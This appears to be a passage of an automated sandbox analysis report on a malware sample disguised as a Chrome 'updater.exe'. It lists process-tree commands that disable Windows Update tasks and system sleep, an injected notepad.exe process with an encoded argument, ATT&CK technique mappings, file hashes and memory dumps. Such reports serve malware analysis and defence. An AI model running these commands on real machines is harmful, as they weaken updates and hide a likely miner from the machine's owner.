PID:368

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
5⤵
PID:592

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:1060

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:2040

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
PID:1272

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1312

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:900

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1596

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1176

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe "giyxhlnw"
4⤵
PID:796

C:\Windows\System32\notepad.exe
C:\Windows\System32\notepad.exe xzdqclthzpcazp0 6E3sjfZq2rJQaxvLPmXgsBL6xjjYguHWtOpZ+stIdvsjpN5Mqdy4DBfa6KATFfaKQjZcNqd1938GRB8dGIm2jUo1P1EwqD6WsAjiwuDAWLCfR3BRzADWgpJ7CQxFR7+anCrIhDT/00bieUv+n3qzA/ZBTeGzJOEzp2ufDT4ez7i94dFOd7htQWVDfk0FvX4a+088kTIG70C+qoBp7PPo1o2A5n8KneHMS5/guyM+nQkyz5PCuPtW1otcyRyfkXuJFiqnw4xHcIav5OP5k07szbPwxOTbqWzmU88osXNGi3m9t4Gwg0G56kg7iABsHbrK5UzmJ/FgcEz0jZ/3un+gS+Rf+IWiuYLXvFLT3dhSYQEp2MbWtYrce1ynEL2g4m1i3nZh07E/ntkN3OenhsoDXadhJLavl9NK0sNtCm2olw7Es0i9g5kp1KX++H2R+p8TerO894R0g6VcrvRRJ+3FNfFJEDMYbyeu61ZEsJe2P9UVJBbbbkXTZny0JoLyKbpVAGAT9wmmSPrpsDA8G3bbPD2mzExQDUSq6vDCincR1pfndSpJ6ETOEAak8MK+m/fKPDk8iiEXOF+mvhBrtYGTnSCz2kL1bsCs/yWKCKTGO/4=
4⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1712

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
2.5MB

MD5
3db308a4a293420df30a444944f2ccb6

SHA1
4cae8d8a25167bc0ce3e8bfae7ccde1b82f7b0ea

SHA256
a9cd4676ee19c15148cf4590b9f32363bd61ecb3ddfc28673a797e8cf3fda5a7

SHA512
a74aea4470291b28a04d7eff1ec2e00fd5e445f6235c8e266a34f5041c63c875f874a8e66eb8c10ea0a56c7ee2130deaf2addc011959942296b015293f805c79

Download Submit
C:\Program Files\Google\Chrome\updater.exe
Filesize
2.5MB

MD5
3db308a4a293420df30a444944f2ccb6

SHA1
4cae8d8a25167bc0ce3e8bfae7ccde1b82f7b0ea

SHA256
a9cd4676ee19c15148cf4590b9f32363bd61ecb3ddfc28673a797e8cf3fda5a7

SHA512
a74aea4470291b28a04d7eff1ec2e00fd5e445f6235c8e266a34f5041c63c875f874a8e66eb8c10ea0a56c7ee2130deaf2addc011959942296b015293f805c79

Download Submit
\Program Files\Google\Chrome\updater.exe
Filesize
2.5MB

MD5
3db308a4a293420df30a444944f2ccb6

SHA1
4cae8d8a25167bc0ce3e8bfae7ccde1b82f7b0ea

SHA256
a9cd4676ee19c15148cf4590b9f32363bd61ecb3ddfc28673a797e8cf3fda5a7

SHA512
a74aea4470291b28a04d7eff1ec2e00fd5e445f6235c8e266a34f5041c63c875f874a8e66eb8c10ea0a56c7ee2130deaf2addc011959942296b015293f805c79

Download Submit
memory/284-113-0x0000000000000000-mapping.dmp

Download
memory/368-134-0x0000000000000000-mapping.dmp

Download
memory/520-79-0x0000000000000000-mapping.dmp

Download
memory/540-90-0x0000000000000000-mapping.dmp

Download
memory/572-121-0x0000000000000000-mapping.dmp

Download
memory/592-136-0x0000000000000000-mapping.dmp

Download
memory/616-68-0x0000000000000000-mapping.dmp

Download
memory/616-129-0x0000000000000000-mapping.dmp

Download
memory/636-124-0x0000000000000000-mapping.dmp

Download
memory/636-92-0x0000000000000000-mapping.dmp

Download
memory/728-116-0x0000000000000000-mapping.dmp

Download
memory/772-83-0x0000000000000000-mapping.dmp

Download
memory/796-137-0x0000000000060000-0x0000000000067000-memory.dmp

Filesize
28KB

Download
memory/796-139-0x0000000000000000-mapping.dmp

Download
memory/796-140-0x0000000000060000-0x0000000000067000-memory.dmp

Filesize
28KB

Download
memory/796-141-0x00000000002D0000-0x00000000002D6000-memory.dmp

Filesize
24KB

Download
memory/832-66-0x0000000000000000-mapping.dmp

Download
memory/836-76-0x0000000000000000-mapping.dmp

Download
memory/872-81-0x0000000000000000-mapping.dmp

Download
memory/900-115-0x0000000000000000-mapping.dmp

Download
memory/1028-111-0x0000000000000000-mapping.dmp

Download
memory/1068-117-0x0000000000000000-mapping.dmp

Download
memory/1080-72-0x0000000000000000-mapping.dmp

Download
memory/1100-69-0x0000000000000000-mapping.dmp

Download
memory/1112-84-0x0000000000000000-mapping.dmp

Download
memory/1116-114-0x0000000000000000-mapping.dmp

Download
memory/1120-98-0x0000000000000000-mapping.dmp

Download
memory/1120-131-0x0000000000000000-mapping.dmp

Download
memory/1136-132-0x0000000000000000-mapping.dmp

Download
memory/1136-99-0x0000000000000000-mapping.dmp

Download
memory/1176-82-0x0000000000000000-mapping.dmp

Download
memory/1176-122-0x0000000000000000-mapping.dmp

Download
memory/1240-120-0x0000000000000000-mapping.dmp

Download
memory/1272-110-0x0000000000000000-mapping.dmp

Download
memory/1276-126-0x0000000000000000-mapping.dmp

Download
memory/1276-94-0x0000000000000000-mapping.dmp

Download
memory/1312-112-0x0000000000000000-mapping.dmp

Download
memory/1336-70-0x0000000000000000-mapping.dmp

Download
memory/1340-71-0x0000000000000000-mapping.dmp

Download
memory/1344-78-0x0000000000000000-mapping.dmp

Download
memory/1376-88-0x0000000000000000-mapping.dmp

Download
memory/1508-77-0x0000000000000000-mapping.dmp

Download
memory/1544-63-0x000000000266B000-0x000000000268A000-memory.dmp

Filesize
124KB

Download
memory/1544-62-0x0000000002664000-0x0000000002667000-memory.dmp

Filesize
12KB

Download
memory/1544-64-0x000000000266B000-0x000000000268A000-memory.dmp

Filesize
124KB

Download
memory/1544-61-0x000000001B6E0000-0x000000001B9DF000-memory.dmp

Filesize
3.0MB

Download
memory/1544-60-0x000007FEECC10000-0x000007FEED76D000-memory.dmp

Filesize
11.4MB

Download
memory/1544-59-0x000007FEED770000-0x000007FEEE193000-memory.dmp

Filesize
10.1MB

Download
memory/1544-56-0x0000000000000000-mapping.dmp

Download
memory/1552-65-0x0000000000000000-mapping.dmp

Download
memory/1568-67-0x0000000000000000-mapping.dmp

Download
memory/1568-97-0x0000000000000000-mapping.dmp

Download
memory/1592-130-0x0000000000000000-mapping.dmp

Download
memory/1596-118-0x0000000000000000-mapping.dmp

Download
memory/1600-133-0x0000000000000000-mapping.dmp

Download
memory/1600-100-0x0000000000000000-mapping.dmp

Download
memory/1616-86-0x0000000000000000-mapping.dmp

Download
memory/1620-119-0x0000000000000000-mapping.dmp

Download
memory/1632-109-0x0000000000000000-mapping.dmp

Download
memory/1688-55-0x000007FEFC5A1000-0x000007FEFC5A3000-memory.dmp

Filesize
8KB

Download
memory/1688-58-0x00000000000A0000-0x00000000002F0000-memory.dmp

Filesize
2.3MB

Download
memory/1688-54-0x000000001B520000-0x000000001B770000-memory.dmp

Filesize
2.3MB

Download
memory/1712-146-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1712-156-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1712-148-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1712-160-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1712-150-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1712-152-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1712-158-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1712-143-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1712-162-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1712-159-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1712-154-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1712-167-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1712-144-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1712-164-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1712-165-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1712-166-0x0000000000070000-0x0000000000090000-memory.dmp

Filesize
128KB

Download
memory/1712-153-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1732-95-0x0000000000000000-mapping.dmp

Download
memory/1732-127-0x0000000000000000-mapping.dmp

Download
memory/1780-125-0x0000000000000000-mapping.dmp

Download
memory/1780-93-0x0000000000000000-mapping.dmp

Download
memory/1832-91-0x0000000000000000-mapping.dmp

Download
memory/1888-73-0x0000000000000000-mapping.dmp

Download
memory/1892-85-0x0000000000000000-mapping.dmp

Download
memory/1908-135-0x0000000000FF0000-0x0000000000FF6000-memory.dmp

Filesize
24KB

Download
memory/1916-106-0x00000000011C4000-0x00000000011C7000-memory.dmp

Filesize
12KB

Download
memory/1916-108-0x00000000011CB000-0x00000000011EA000-memory.dmp

Filesize
124KB

Download
memory/1916-107-0x00000000011C4000-0x00000000011C7000-memory.dmp

Filesize
12KB

Download
memory/1916-105-0x000007FEECCF0000-0x000007FEED84D000-memory.dmp

Filesize
11.4MB

Download
memory/1916-102-0x0000000000000000-mapping.dmp

Download
memory/1924-96-0x0000000000000000-mapping.dmp

Download
memory/1924-128-0x0000000000000000-mapping.dmp

Download
memory/1936-123-0x0000000000000000-mapping.dmp

Download
memory/1996-80-0x0000000000000000-mapping.dmp

Download
memory/2000-75-0x0000000000000000-mapping.dmp

Download
memory/2040-74-0x0000000000000000-mapping.dmp

Download